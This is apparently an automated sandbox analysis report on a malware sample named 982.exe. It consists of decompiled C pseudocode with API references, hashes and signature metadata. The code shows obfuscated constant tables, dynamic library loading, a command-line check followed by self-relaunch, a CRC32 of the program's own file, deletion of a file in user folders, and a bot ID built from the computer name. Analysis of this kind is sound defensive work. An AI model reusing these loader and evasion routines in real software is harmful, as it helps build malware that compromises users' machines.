				_v572 = 0xa39a43d0;
				_v568 = 0x72e43df5;
				_v564 = 0x7def3a5b;
				_v560 = 0xa3e032db;
				_v556 = 0xbaae509a;
				_v552 = 0x725465ba;
				_v548 = 0x180c7d81;
				_v544 = 0x811b17e0;
				_v540 = 0x74704b5e;
				_v536 = 0x22f47ff4;
				_v532 = 0xcc6df209;
				_v528 = 0x38770f86;
				_v524 = 0x4016937a;
				_v520 = 0x62212e95;
				_v516 = 0x3aecdd;
				_v512 = 0x9a86b823;
				_v508 = 0xe493bd28;
				_v504 = 0x94dafcea;
				_v500 = 0x6e43dbbe;
				_v496 = 0x11a6291f;
				_v492 = 0x68d91615;
				_v488 = 0x4076d820;
				_v484 = 0xa757a1c7;
				_v480 = 0xadc5eff9;
				_v476 = 0x1d06787c;
				_v472 = 0x48121116;
				_v468 = 0xb8042b02;
				_v464 = 0xa2423491;
				_v460 = 0xd20d9bf7;
				_v456 = 0x33d51d03;
				_v452 = 0x632db46e;
				_v448 = 0x8fce7afe;
				_v444 = 0x88271008;
				_v440 = 0xefddbe88;
				_v436 = 0x24ae9a32;
				_v432 = 0x7bf42295;
				_v428 = 0x268ba065;
				_v424 = 0x124f44dd;
				_v420 = 0xba93dab;
				_v416 = 0xe06e84b0;
				_v412 = 0x8d9ef9eb;
				_v408 = 0xa4caef6b;
				_v404 = 0xb8f2d0d2;
				_v400 = 0x4eef8287;
				_v396 = 0x44d6faca;
				_v392 = 0xb021dd39;
				_v388 = 0x65728ae9;
				_v384 = 0x4ac666ee;
				_v380 = 0xe2d55fa6;
				_v376 = 0xd488f647;
				_v372 = 0x377d26a2;
				_v368 = 0xb1c3322c;
				_v364 = 0xbbb1dfd9;
				_v360 = 0x7ef9d65d;
				_v356 = 0xd69df707;
				_v352 = 0xc8a80235;
				_v348 = 0x7ede6d98;
				_v344 = 0x5a57d2a2;
				_v340 = 0x40af756f;
				_v336 = 0x2944fdef;
				_v332 = 0x3447d376;
				_v328 = 0x7ddf0dbd;
				_v324 = 0x8c688b53;
				_v320 = 0xdede8f54;
				_v316 = 0x1855f41e;
				_v312 = 0xfa3bc857;
				_v308 = 0x1cc619e7;
				_v304 = 0x78f4cf52;
				_v300 = 0x99b717b5;
				_v296 = 0x350e7f98;
				_v292 = 0x6bebc19;
				_v288 = 0x26729ca6;
				_v284 = 0x85259ee2;
				_v280 = 0x4ff5a8b1;
				_v276 = 0x761762f3;
				_v272 = 0xe2377b6c;
				_v268 = 0xf606ea17;
				_v264 = 0x732cd514;
				_v260 = 0x95d9d9f6;
				_v256 = 0x4e1a0c62;
				_v252 = 0x2f571a4a;
				_v248 = 0xde7ffc35;
				_v244 = 0xc1baae08;
				_v240 = 0x330c550e;
				_v236 = 0xe51e9d38;
				_v232 = 0x5c7bafc;
				_v228 = 0xfede311;
				_v224 = 0x7bb4b589;
				_v220 = 0x49de023d;
				_v216 = 0x5746334b;
				_v212 = 0x47c5668e;
				_v208 = 0x20d356d6;
				_v204 = 0x468884d9;
				_v200 = 0xf1a3088;
				_v196 = 0x299cca75;
				_v192 = 0x7e0aef8c;
				_v188 = 0x36e551d0;
				_v184 = 0x48145815;
				_v180 = 0x79d6fd9e;
				_v176 = 0xcb924866;
				_v172 = 0x8efb6fa1;
				_v168 = 0xb926985e;
				_v164 = 0xa196ac7b;
				_v160 = 0xaeab18d4;
				_v156 = 0x78015c1f;
				_v152 = 0x5819869;
				_v148 = 0xcca218d0;
				_v144 = 0x7d06249f;
				_v140 = 0xf0a7edaa;
				_v136 = 0x6a004c;
				_v132 = 0xf9b9513f;
				_v128 = 0x741d919f;
				_v124 = 0x2ea3bc66;
				_v120 = 0xab1dc78a;
				_v116 = 0x74b6dbaa;
				_v112 = 0x7e81bfa1;
				_v108 = 0x4202d69c;
				_v104 = 0x38ce33a7;
				_v100 = 0x595e8000;
				_v96 = 0x290b2103;
				_v92 = 0xe4e40622;
				_v88 = 0xc8dd8e6f;
				_v84 = 0x4979097d;
				_v80 = 0xfee0d431;
				_v76 = 0xb9ce1ec8;
				_v72 = 0x67261b7e;
				_v68 = 0x4ae4b37a;
				_v64 = 0xf9871833;
				_v60 = 0x68a06f47;
				_v56 = 0xd195cac2;
				_v52 = 0x5f95137e;
				_v48 = 0xfcdb6acb;
				_v44 = 0x816238c4;
				_v40 = 0xafd25fa6;
				_v36 = 0xc5ef91f0;
				_v32 = 0x9fbd261a;
				_v28 = 0xfa1b3f6e;
				_v24 = 0x31581501;
				_v20 = 0x54d81d91;
				_v16 = 0xbe2861d0;
				_v12 = 0xb3163952;
				_v8 = 0x10e6581a;
				_t514 = E00401A52(0x4127b0, 0x72fc3a35);
				_t506 = LoadLibraryW(_t505); // executed
				 *0x4164e8 = _t506;
				L00401B09(_t514);
				_push(0x412e80);
				_push(0x2bf385b5);
				return E004012FF( *0x4164e8,  &_v2016, 0x1f7);
			}



























































































































































































































































































































































































































































































































                  0x00406334
                  0x0040633e
                  0x00406348
                  0x00406352
                  0x0040635c
                  0x00406366
                  0x00406370
                  0x0040637a
                  0x00406384
                  0x0040638e
                  0x00406398
                  0x004063a2
                  0x004063ac
                  0x004063b6
                  0x004063c0
                  0x004063ca
                  0x004063d4
                  0x004063de
                  0x004063e8
                  0x004063f2
                  0x004063fc
                  0x00406406
                  0x00406410
                  0x0040641a
                  0x00406424
                  0x0040642e
                  0x00406438
                  0x00406442
                  0x0040644c
                  0x00406456
                  0x00406460
                  0x0040646a
                  0x00406474
                  0x0040647e
                  0x00406488
                  0x00406492
                  0x0040649c
                  0x004064a6
                  0x004064b0
                  0x004064ba
                  0x004064c4
                  0x004064ce
                  0x004064d8
                  0x004064e2
                  0x004064ec
                  0x004064f6
                  0x00406500
                  0x0040650a
                  0x00406514
                  0x0040651e
                  0x00406528
                  0x00406532
                  0x0040653c
                  0x00406546
                  0x00406550
                  0x0040655a
                  0x00406564
                  0x0040656e
                  0x00406578
                  0x00406582
                  0x0040658c
                  0x00406596
                  0x004065a0
                  0x004065aa
                  0x004065b4
                  0x004065be
                  0x004065c8
                  0x004065d2
                  0x004065dc
                  0x004065e6
                  0x004065f0
                  0x004065fa
                  0x00406604
                  0x0040660e
                  0x00406618
                  0x00406622
                  0x0040662c
                  0x00406636
                  0x00406640
                  0x0040664a
                  0x00406654
                  0x0040665e
                  0x00406668
                  0x00406672
                  0x0040667c
                  0x00406686
                  0x00406690
                  0x0040669a
                  0x004066a4
                  0x004066ae
                  0x004066b8
                  0x004066c2
                  0x004066cc
                  0x004066d6
                  0x004066e0
                  0x004066ea
                  0x004066f4
                  0x004066fe
                  0x00406708
                  0x00406712
                  0x0040671c
                  0x00406726
                  0x00406730
                  0x0040673a
                  0x00406744
                  0x0040674e
                  0x00406758
                  0x00406762
                  0x0040676c
                  0x00406776
                  0x00406780
                  0x0040678a
                  0x00406794
                  0x0040679e
                  0x004067a8
                  0x004067b2
                  0x004067bc
                  0x004067c6
                  0x004067d0
                  0x004067da
                  0x004067e4
                  0x004067ee
                  0x004067f8
                  0x00406802
                  0x0040680c
                  0x00406816
                  0x00406820
                  0x0040682a
                  0x00406834
                  0x0040683e
                  0x00406848
                  0x00406852
                  0x0040685c
                  0x00406866
                  0x00406870
                  0x0040687a
                  0x00406884
                  0x0040688e
                  0x00406898
                  0x004068a2
                  0x004068ac
                  0x004068b6
                  0x004068c0
                  0x004068ca
                  0x004068d4
                  0x004068de
                  0x004068e8
                  0x004068f2
                  0x004068fc
                  0x00406906
                  0x00406910
                  0x0040691a
                  0x00406924
                  0x0040692e
                  0x00406938
                  0x00406942
                  0x0040694c
                  0x00406956
                  0x00406960
                  0x0040696a
                  0x00406974
                  0x0040697e
                  0x00406988
                  0x00406992
                  0x0040699c
                  0x004069a6
                  0x004069b0
                  0x004069ba
                  0x004069c4
                  0x004069ce
                  0x004069d8
                  0x004069e2
                  0x004069ec
                  0x004069f6
                  0x00406a00
                  0x00406a0a
                  0x00406a14
                  0x00406a1e
                  0x00406a28
                  0x00406a32
                  0x00406a3c
                  0x00406a46
                  0x00406a50
                  0x00406a5a
                  0x00406a64
                  0x00406a6e
                  0x00406a78
                  0x00406a82
                  0x00406a8c
                  0x00406a96
                  0x00406aa0
                  0x00406aaa
                  0x00406ab4
                  0x00406abe
                  0x00406ac8
                  0x00406ad2
                  0x00406adc
                  0x00406ae6
                  0x00406af0
                  0x00406afa
                  0x00406b04
                  0x00406b0e
                  0x00406b18
                  0x00406b22
                  0x00406b2c
                  0x00406b36
                  0x00406b40
                  0x00406b4a
                  0x00406b54
                  0x00406b5e
                  0x00406b68
                  0x00406b72
                  0x00406b7c
                  0x00406b86
                  0x00406b90
                  0x00406b9a
                  0x00406ba4
                  0x00406bae
                  0x00406bb8
                  0x00406bc2
                  0x00406bcc
                  0x00406bd6
                  0x00406be0
                  0x00406bea
                  0x00406bf4
                  0x00406bfe
                  0x00406c08
                  0x00406c12
                  0x00406c1c
                  0x00406c26
                  0x00406c30
                  0x00406c3a
                  0x00406c44
                  0x00406c4e
                  0x00406c58
                  0x00406c62
                  0x00406c6c
                  0x00406c76
                  0x00406c80
                  0x00406c8a
                  0x00406c94
                  0x00406c9e
                  0x00406ca8
                  0x00406cb2
                  0x00406cbc
                  0x00406cc6
                  0x00406cd0
                  0x00406cda
                  0x00406ce4
                  0x00406cee
                  0x00406cf8
                  0x00406d02
                  0x00406d0c
                  0x00406d16
                  0x00406d20
                  0x00406d2a
                  0x00406d34
                  0x00406d3e
                  0x00406d48
                  0x00406d52
                  0x00406d5c
                  0x00406d66
                  0x00406d70
                  0x00406d7a
                  0x00406d84
                  0x00406d8e
                  0x00406d98
                  0x00406da2
                  0x00406dac
                  0x00406db6
                  0x00406dc0
                  0x00406dca
                  0x00406dd4
                  0x00406dde
                  0x00406de8
                  0x00406df2
                  0x00406dfc
                  0x00406e06
                  0x00406e10
                  0x00406e1a
                  0x00406e24
                  0x00406e2e
                  0x00406e38
                  0x00406e42
                  0x00406e4c
                  0x00406e56
                  0x00406e60
                  0x00406e6a
                  0x00406e74
                  0x00406e7e
                  0x00406e88
                  0x00406e92
                  0x00406e9c
                  0x00406ea6
                  0x00406eb0
                  0x00406eba
                  0x00406ec4
                  0x00406ece
                  0x00406ed8
                  0x00406ee2
                  0x00406eec
                  0x00406ef6
                  0x00406f00
                  0x00406f0a
                  0x00406f14
                  0x00406f1e
                  0x00406f28
                  0x00406f32
                  0x00406f3c
                  0x00406f46
                  0x00406f50
                  0x00406f5a
                  0x00406f64
                  0x00406f6e
                  0x00406f78
                  0x00406f82
                  0x00406f8c
                  0x00406f96
                  0x00406fa0
                  0x00406faa
                  0x00406fb4
                  0x00406fbe
                  0x00406fc8
                  0x00406fd2
                  0x00406fdc
                  0x00406fe6
                  0x00406ff0
                  0x00406ffa
                  0x00407004
                  0x0040700e
                  0x00407018
                  0x00407022
                  0x0040702c
                  0x00407036
                  0x00407040
                  0x0040704a
                  0x00407054
                  0x0040705e
                  0x00407068
                  0x00407072
                  0x0040707c
                  0x00407086
                  0x00407090
                  0x0040709a
                  0x004070a4
                  0x004070ae
                  0x004070b8
                  0x004070c2
                  0x004070cc
                  0x004070d6
                  0x004070e0
                  0x004070ea
                  0x004070f4
                  0x004070fe
                  0x00407108
                  0x00407112
                  0x0040711c
                  0x00407126
                  0x00407130
                  0x0040713a
                  0x00407144
                  0x0040714e
                  0x00407158
                  0x00407162
                  0x0040716c
                  0x00407176
                  0x00407180
                  0x0040718a
                  0x00407194
                  0x0040719e
                  0x004071a8
                  0x004071b2
                  0x004071bc
                  0x004071c6
                  0x004071d0
                  0x004071da
                  0x004071e4
                  0x004071ee
                  0x004071f8
                  0x00407202
                  0x0040720c
                  0x00407216
                  0x00407220
                  0x0040722a
                  0x00407234
                  0x0040723e
                  0x00407248
                  0x00407252
                  0x0040725c
                  0x00407266
                  0x00407270
                  0x0040727a
                  0x00407284
                  0x0040728e
                  0x00407298
                  0x004072a2
                  0x004072ac
                  0x004072b6
                  0x004072c0
                  0x004072ca
                  0x004072d4
                  0x004072de
                  0x004072e8
                  0x004072f2
                  0x004072fc
                  0x00407306
                  0x00407310
                  0x0040731a
                  0x00407324
                  0x0040732e
                  0x00407338
                  0x00407342
                  0x0040734c
                  0x00407356
                  0x00407360
                  0x0040736a
                  0x00407374
                  0x0040737e
                  0x00407388
                  0x00407392
                  0x0040739c
                  0x004073a6
                  0x004073b0
                  0x004073ba
                  0x004073c4
                  0x004073ce
                  0x004073d8
                  0x004073e2
                  0x004073ec
                  0x004073f6
                  0x00407400
                  0x0040740a
                  0x00407414
                  0x0040741e
                  0x00407428
                  0x00407432
                  0x0040743c
                  0x00407446
                  0x00407450
                  0x0040745a
                  0x00407464
                  0x0040746e
                  0x00407478
                  0x00407482
                  0x0040748c
                  0x00407496
                  0x004074a0
                  0x004074aa
                  0x004074b4
                  0x004074be
                  0x004074c8
                  0x004074d2
                  0x004074dc
                  0x004074e6
                  0x004074f0
                  0x004074fa
                  0x00407504
                  0x0040750e
                  0x00407518
                  0x00407522
                  0x0040752c
                  0x00407536
                  0x00407540
                  0x0040754a
                  0x00407554
                  0x0040755e
                  0x00407568
                  0x00407572
                  0x0040757c
                  0x00407586
                  0x00407590
                  0x0040759a
                  0x004075a1
                  0x004075a8
                  0x004075af
                  0x004075b6
                  0x004075bd
                  0x004075c4
                  0x004075cb
                  0x004075d2
                  0x004075d9
                  0x004075e0
                  0x004075e7
                  0x004075ee
                  0x004075f5
                  0x00407601
                  0x0040760d
                  0x00407614
                  0x0040761b
                  0x00407622
                  0x00407629
                  0x00407630
                  0x00407637
                  0x0040763e
                  0x00407645
                  0x0040764c
                  0x00407653
                  0x0040765a
                  0x00407661
                  0x00407668
                  0x0040766f
                  0x00407676
                  0x0040767d
                  0x00407689
                  0x0040768c
                  0x00407694
                  0x00407699
                  0x004076aa
                  0x004076af
                  0x004076c5

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040768C
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: !i$'v#$-OQ3$0sN$6k4!$K3FW$L$THr$Tt)$U<([$YV7$[:}$^Kpt$l{7$m^$}yI$~~F$2=9$Q
                  • API String ID: 1029625771-1009886285
                  • Opcode ID: e035405825f2c6f0528038317cbdc484b85bd039236133c0542503d7ebbb99e0
                  • Instruction ID: 8b68394b666451bb9afb97b728dfcd24b1eb0b6c41965aaa66b61d789d097ed1
                  • Opcode Fuzzy Hash: e035405825f2c6f0528038317cbdc484b85bd039236133c0542503d7ebbb99e0
                  • Instruction Fuzzy Hash: 6992A5B0C4A7698FDBA18F429E8478DBA75FB41304F5086C8C25D3B215CB761AD2CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F072, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63stringUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			_entry_() {
				char _v20;
				short _v540;
				short _v1060;
				void* _t15;
				int _t21;
				WCHAR* _t25;
				void* _t38;
				WCHAR* _t39;
				WCHAR* _t43;

				E0040CACE();
				E0040DB84();
				GetModuleFileNameW(0,  &_v1060, 0x104);
				_t15 = E00401144( &_v1060);
				_t38 = E00401A52(0x4129a0, 0x72fc3a35);
				 *0x4143a4( &_v540, 0x104, _t38, _t15);
				_t32 = _t38;
				L00401B09(_t38);
				_t39 = GetCommandLineW();
				_t21 = lstrlenW(_t39);
				_t43 =  &(_t39[_t21 - lstrlenW( &_v540)]);
				while(_t39 <= _t43) {
					_t25 = lstrcmpiW(_t39,  &_v540); // executed
					__eflags = _t25;
					if(__eflags != 0) {
						_t39 =  &(_t39[1]);
						__eflags = _t39;
						continue;
					}
					E0040C84E(0x104, _t32, _t39, __eflags); // executed
					ExitProcess(0); // executed
				}
				E00401CC2( &_v1060,  &_v540, _t32,  &_v20);
				ExitProcess(0);
			}












                  0x0040f07e
                  0x0040f083
                  0x0040f097
                  0x0040f0a3
                  0x0040f0b9
                  0x0040f0c5
                  0x0040f0ce
                  0x0040f0d0
                  0x0040f0db
                  0x0040f0de
                  0x0040f0f5
                  0x0040f11c
                  0x0040f102
                  0x0040f108
                  0x0040f10a
                  0x0040f119
                  0x0040f119
                  0x00000000
                  0x0040f119
                  0x0040f10c
                  0x0040f113
                  0x0040f113
                  0x0040f131
                  0x0040f13a

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F097
                  • _snwprintf.NTDLL ref: 0040F0C5
                  • GetCommandLineW.KERNEL32 ref: 0040F0D5
                  • lstrlenW.KERNEL32(00000000), ref: 0040F0DE
                  • lstrlenW.KERNEL32(?), ref: 0040F0ED
                  • lstrcmpiW.KERNELBASE(00000000,?), ref: 0040F102
                  • ExitProcess.KERNEL32 ref: 0040F113
                    • Part of subcall function 00401CC2: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401CF2
                  • ExitProcess.KERNEL32 ref: 0040F13A
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Exitlstrlen$CommandCreateFileLineModuleName_snwprintflstrcmpi
                  • String ID: g8Cw
                  • API String ID: 4243820956-3103284439
                  • Opcode ID: e8fef4413f66b5dc776fc09e6af1cab733b72d7a78056a43239f7943bfe9b5bf
                  • Instruction ID: 96f63cbf6c12603b9eafb981d3b8471d0b236fe68b2e75c18f179b1aecd08856
                  • Opcode Fuzzy Hash: e8fef4413f66b5dc776fc09e6af1cab733b72d7a78056a43239f7943bfe9b5bf
                  • Instruction Fuzzy Hash: 5F118472600118ABD710AB65DC89AFF377CEB40349F00417AF505A7192EE346E458BA9
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F3C5, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 52fileUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0040F3C5() {
				void* _t1;
				void* _t2;
				int _t3;
				void* _t4;
				void* _t10;
				void* _t12;
				void* _t14;

				_t1 = CreateFileW("C:\Users\luketaylor\982.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
				_t14 = _t1;
				if(_t14 != 0xffffffff) {
					_t2 = CreateFileMappingW(_t14, 0, 2, 0, 0, 0); // executed
					_t12 = _t2;
					if(_t12 != 0) {
						_t4 = MapViewOfFile(_t12, 4, 0, 0, 0); // executed
						_t10 = _t4;
						if(_t10 != 0) {
							 *0x41574c = RtlComputeCrc32(0, _t10, GetFileSize(_t14, 0));
							UnmapViewOfFile(_t10);
						}
						CloseHandle(_t12); // executed
					}
					_t3 = CloseHandle(_t14); // executed
					return _t3;
				}
				return _t1;
			}










                  0x0040f3da
                  0x0040f3e0
                  0x0040f3e5
                  0x0040f3ef
                  0x0040f3f5
                  0x0040f3f9
                  0x0040f401
                  0x0040f407
                  0x0040f40b
                  0x0040f421
                  0x0040f426
                  0x0040f426
                  0x0040f42d
                  0x0040f42d
                  0x0040f434
                  0x00000000
                  0x0040f43a
                  0x0040f43d

                  APIs
                  • CreateFileW.KERNELBASE(C:\Users\user\982.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                  • GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                  • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                  • UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                  • CloseHandle.KERNELBASE(00000000), ref: 0040F42D
                  • CloseHandle.KERNELBASE(00000000), ref: 0040F434
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleView$ComputeCrc32MappingSizeUnmap
                  • String ID: C:\Users\user\982.exe
                  • API String ID: 3664593344-486285761
                  • Opcode ID: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction ID: 4f8756942f13f85b051569e497b215ae0a3eeb64e29cb283b43bbd1ff795de01
                  • Opcode Fuzzy Hash: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction Fuzzy Hash: F60131B22007187FF2211FA4ACCDFFB656CDB85B9BF108135FA11A12D0DAA44D014679
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F3C5, Relevance: 12.1, APIs: 8, Instructions: 52fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F3C5() {
				void* _t1;
				void* _t2;
				int _t3;
				void* _t4;
				void* _t10;
				void* _t12;
				void* _t14;

				_t1 = CreateFileW(0x416c50, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t14 = _t1;
				if(_t14 != 0xffffffff) {
					_t2 = CreateFileMappingW(_t14, 0, 2, 0, 0, 0); // executed
					_t12 = _t2;
					if(_t12 != 0) {
						_t4 = MapViewOfFile(_t12, 4, 0, 0, 0); // executed
						_t10 = _t4;
						if(_t10 != 0) {
							 *0x41574c = RtlComputeCrc32(0, _t10, GetFileSize(_t14, 0));
							UnmapViewOfFile(_t10);
						}
						CloseHandle(_t12); // executed
					}
					_t3 = CloseHandle(_t14); // executed
					return _t3;
				}
				return _t1;
			}










                  0x0040f3da
                  0x0040f3e0
                  0x0040f3e5
                  0x0040f3ef
                  0x0040f3f5
                  0x0040f3f9
                  0x0040f401
                  0x0040f407
                  0x0040f40b
                  0x0040f421
                  0x0040f426
                  0x0040f426
                  0x0040f42d
                  0x0040f42d
                  0x0040f434
                  0x00000000
                  0x0040f43a
                  0x0040f43d

                  APIs
                  • CreateFileW.KERNELBASE(00416C50,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                  • GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                  • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                  • UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                  • CloseHandle.KERNELBASE(00000000), ref: 0040F42D
                  • CloseHandle.KERNELBASE(00000000), ref: 0040F434
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleView$ComputeCrc32MappingSizeUnmap
                  • String ID:
                  • API String ID: 3664593344-0
                  • Opcode ID: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction ID: 4f8756942f13f85b051569e497b215ae0a3eeb64e29cb283b43bbd1ff795de01
                  • Opcode Fuzzy Hash: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction Fuzzy Hash: F60131B22007187FF2211FA4ACCDFFB656CDB85B9BF108135FA11A12D0DAA44D014679
                  Uniqueness

                  Uniqueness Score: 0.14%

                  Function 0040F2EE, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71fileUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 39%
                  			E0040F2EE(void* __eflags) {
				char _v524;
				char _v1044;
				short _v1564;
				char* _t17;
				int _t27;
				void* _t45;
				intOrPtr _t48;

				_t42 = E00401A52(0x412a00, 0x4bf67e71);
				E0040F190( &_v1044, _t9);
				L00401B09(_t42);
				_push( &_v524);
				_push(0);
				_push(0);
				_t48 =  *0x415f4c; // 0x1
				if(_t48 == 0) {
					 *0x414c14(0, 0x1c);
					_t43 = E00401A52(0x412df0, 0x4bf67e71);
					_t17 =  &_v524;
					 *0x4143a4(_t17, 0x104, _t15, _t17,  &_v1044);
					_t45 = _t45 + 0x14;
					L00401B09(_t43);
				} else {
					 *0x414c14(0, 0x29);
				}
				_t44 = E00401A52(0x412bb0, 0x4bf67e71);
				 *0x4143a4( &_v1564, 0x104, _t20,  &_v524,  &_v1044);
				L00401B09(_t44);
				_t27 = DeleteFileW( &_v1564); // executed
				return _t27;
			}










                  0x0040f30b
                  0x0040f315
                  0x0040f31c
                  0x0040f32c
                  0x0040f32f
                  0x0040f330
                  0x0040f331
                  0x0040f337
                  0x0040f347
                  0x0040f359
                  0x0040f362
                  0x0040f36c
                  0x0040f372
                  0x0040f377
                  0x0040f339
                  0x0040f33c
                  0x0040f33c
                  0x0040f388
                  0x0040f3a1
                  0x0040f3ac
                  0x0040f3b8
                  0x0040f3c4

                  APIs
                    • Part of subcall function 0040F190: lstrlenW.KERNEL32(00000000,00000000,00000000,00000104,?,?,0040F111), ref: 0040F1A1
                  • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,?), ref: 0040F33C
                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040F347
                  • _snwprintf.NTDLL ref: 0040F36C
                  • _snwprintf.NTDLL ref: 0040F3A1
                  • DeleteFileW.KERNELBASE(?), ref: 0040F3B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf$DeleteFilelstrlen
                  • String ID: g8Cw
                  • API String ID: 1341198303-3103284439
                  • Opcode ID: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction ID: 657008bbddd63c106de985fdb09df341ec56487ec0cf543515cc0156050913b4
                  • Opcode Fuzzy Hash: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction Fuzzy Hash: 5C11B7B1A001189BC720E7619C449EB726DDB84355F0440BBF90AE3291EE385E858BED
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F43E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 107 40f43e-40f45c GetComputerNameW 108 40f4c8 107->108 109 40f45e-40f498 call 4019ab WideCharToMultiByte call 401b09 107->109 110 40f4ce-40f503 call 4019ab _snprintf call 401b09 108->110 109->108 118 40f49a-40f4a1 109->118 118->110 120 40f4a3-40f4a7 118->120 121 40f4a9-40f4ab 120->121 122 40f4ad-40f4af 120->122 121->122 123 40f4c0-40f4c4 121->123 124 40f4b1-40f4b3 122->124 125 40f4b5-40f4b7 122->125 123->120 128 40f4c6 123->128 124->123 124->125 126 40f4b9-40f4bb 125->126 127 40f4bd 125->127 126->123 126->127 127->123 128->110
                  C-Code - Quality: 82%
                  			E0040F43E(void* __ebx) {
				long _v8;
				char _v24;
				short _v56;
				int _t14;
				void* _t15;
				int _t22;
				char _t24;
				char* _t33;

				_v8 = 0x10;
				_t14 = GetComputerNameW( &_v56,  &_v8); // executed
				if(_t14 == 0) {
					L12:
					_v24 = 0x58;
					L13:
					_t15 = E004019AB(0x412e30);
					 *0x414664("813848_3C4E0000", 0x104, _t15,  &_v24,  *0x4164e0);
					return L00401B09(_t15);
				}
				_t22 = WideCharToMultiByte(0, 0x400,  &_v56, 0xffffffff,  &_v24, 0x10, E004019AB(0x412b90), 0);
				L00401B09(_t19);
				if((0 | _t22 > 0x00000000) == 0) {
					goto L12;
				}
				_t33 =  &_v24;
				if(_v24 == 0) {
					goto L13;
				} else {
					goto L3;
				}
				do {
					L3:
					_t24 =  *_t33;
					if(_t24 < 0x30 || _t24 > 0x39) {
						if(_t24 < 0x61 || _t24 > 0x7a) {
							if(_t24 < 0x41 || _t24 > 0x5a) {
								 *_t33 = 0x58;
							}
						}
					}
					_t33 = _t33 + 1;
				} while ( *_t33 != 0);
				goto L13;
			}











                  0x0040f448
                  0x0040f454
                  0x0040f45c
                  0x0040f4c8
                  0x0040f4c8
                  0x0040f4ce
                  0x0040f4d3
                  0x0040f4ef
                  0x0040f503
                  0x0040f503
                  0x0040f481
                  0x0040f490
                  0x0040f498
                  0x00000000
                  0x00000000
                  0x0040f49e
                  0x0040f4a1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040f4a3
                  0x0040f4a3
                  0x0040f4a3
                  0x0040f4a7
                  0x0040f4af
                  0x0040f4b7
